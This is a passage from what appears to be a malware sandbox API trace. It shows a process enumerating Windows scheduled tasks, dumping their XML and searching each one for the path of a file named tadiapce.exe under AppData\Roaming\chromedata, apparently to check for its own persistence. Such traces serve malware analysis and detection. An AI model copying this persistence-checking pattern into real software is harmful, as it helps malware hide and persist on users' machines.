<ClassId>{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.421] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\dps.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\dps.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\WDI\\ResolutionHost</URI>\r\n    <Description>$(@%systemroot%\\system32\\dps.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>10</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.421] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.421] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.421] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe48) returned 0x0
	[0073.421] ITaskFolderCollection:get_Count (in: This=0x55fe48, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.421] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.422] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.422] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x29, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.422] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe10) returned 0x0
	[0073.422] IRegisteredTaskCollection:get_Count (in: This=0x55fe10, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.422] IRegisteredTaskCollection:get_Item (in: This=0x55fe10, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff18) returned 0x0
	[0073.422] IRegisteredTask:get_Name (in: This=0x55ff18, pName=0x128e3c | out: pName=0x128e3c*="QueueReporting") returned 0x0
	[0073.422] IRegisteredTask:get_Xml (in: This=0x55ff18, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\wer.dll,-292)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\wer.dll,-293)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\wer.dll,-294)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Delay>PT13M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Priority>5</Priority>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\wermgr.exe</Command>\r\n      <Arguments>-queuereporting</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.424] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\wer.dll,-292)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\wer.dll,-293)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\wer.dll,-294)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Delay>PT13M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Priority>5</Priority>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\wermgr.exe</Command>\r\n      <Arguments>-queuereporting</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.424] IUnknown:Release (This=0x55ff18) returned 0x0
	[0073.424] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.424] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe10) returned 0x0
	[0073.424] ITaskFolderCollection:get_Count (in: This=0x55fe10, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.424] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.424] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.424] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2a, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.424] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe78) returned 0x0
	[0073.425] IRegisteredTaskCollection:get_Count (in: This=0x55fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.425] IRegisteredTaskCollection:get_Item (in: This=0x55fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.425] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="BfeOnServiceStartTypeChange") returned 0x0
	[0073.425] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange</URI>\r\n    <Author>$(@%SystemRoot%\\system32\\bfe.dll,-2001)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\bfe.dll,-2002)</Description>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <EventTrigger id=\"06688f40-e0af-4efa-8a89-2617bd993d71\">\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>bfe.dll,BfeOnServiceStartTypeChange</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.426] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange</URI>\r\n    <Author>$(@%SystemRoot%\\system32\\bfe.dll,-2001)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\bfe.dll,-2002)</Description>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <EventTrigger id=\"06688f40-e0af-4efa-8a89-2617bd993d71\">\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>bfe.dll,BfeOnServiceStartTypeChange</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.426] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.427] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.427] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe78) returned 0x0
	[0073.427] ITaskFolderCollection:get_Count (in: This=0x55fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.427] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.427] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.427] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2b, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.427] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe10) returned 0x0
	[0073.427] IRegisteredTaskCollection:get_Count (in: This=0x55fe10, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.427] IRegisteredTaskCollection:get_Item (in: This=0x55fe10, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff18) returned 0x0
	[0073.428] IRegisteredTask:get_Name (in: This=0x55ff18, pName=0x128e3c | out: pName=0x128e3c*="UpdateLibrary") returned 0x0
	[0073.428] IRegisteredTask:get_Xml (in: This=0x55ff18, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Author>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)</Author>\r\n    <Description>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"System\"\r\n                  &gt;\r\n                &lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AuthenticatedUsers\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AuthenticatedUsers\">\r\n    <Exec>\r\n      <Command>\"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"</Command>\r\n    </Exec>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.429] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Author>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)</Author>\r\n    <Description>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"System\"\r\n                  &gt;\r\n                &lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AuthenticatedUsers\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AuthenticatedUsers\">\r\n    <Exec>\r\n      <Command>\"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"</Command>\r\n    </Exec>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.429] IUnknown:Release (This=0x55ff18) returned 0x0
	[0073.429] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.429] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe10) returned 0x0
	[0073.430] ITaskFolderCollection:get_Count (in: This=0x55fe10, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.430] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.430] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.430] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2c, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.430] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe60) returned 0x0
	[0073.430] IRegisteredTaskCollection:get_Count (in: This=0x55fe60, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.430] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.430] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="ConfigNotification") returned 0x0
	[0073.431] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>This scheduled task notifies the user that Windows Backup has not been configured.</Description>\r\n    <URI>Microsoft\\Windows\\WindowsBackup\\ConfigNotification</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2010-11-27T10:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\System32\\sdclt.exe</Command>\r\n      <Arguments>/CONFIGNOTIFICATION</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.432] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>This scheduled task notifies the user that Windows Backup has not been configured.</Description>\r\n    <URI>Microsoft\\Windows\\WindowsBackup\\ConfigNotification</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2010-11-27T10:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\System32\\sdclt.exe</Command>\r\n      <Arguments>/CONFIGNOTIFICATION</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.433] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.433] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.433] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe60) returned 0x0
	[0073.433] ITaskFolderCollection:get_Count (in: This=0x55fe60, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.433] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.433] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.433] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2d, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.433] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe68) returned 0x0
	[0073.434] IRegisteredTaskCollection:get_Count (in: This=0x55fe68, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.434] IRegisteredTaskCollection:get_Item (in: This=0x55fe68, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff60) returned 0x0
	[0073.434] IRegisteredTask:get_Name (in: This=0x55ff60, pName=0x128e3c | out: pName=0x128e3c*="Calibration Loader") returned 0x0
	[0073.434] IRegisteredTask:get_Xml (in: This=0x55ff60, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\mscms.dll,-200)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\mscms.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\mscms.dll,-202)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"C3B270C8-8291-4326-92F6-2FF65DE39010\">\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n    <SessionStateChangeTrigger id=\"79B8DA54-F688-4a18-B2D4-7AA891A193E8\">\r\n      <Enabled>true</Enabled>\r\n      <StateChange>ConsoleConnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    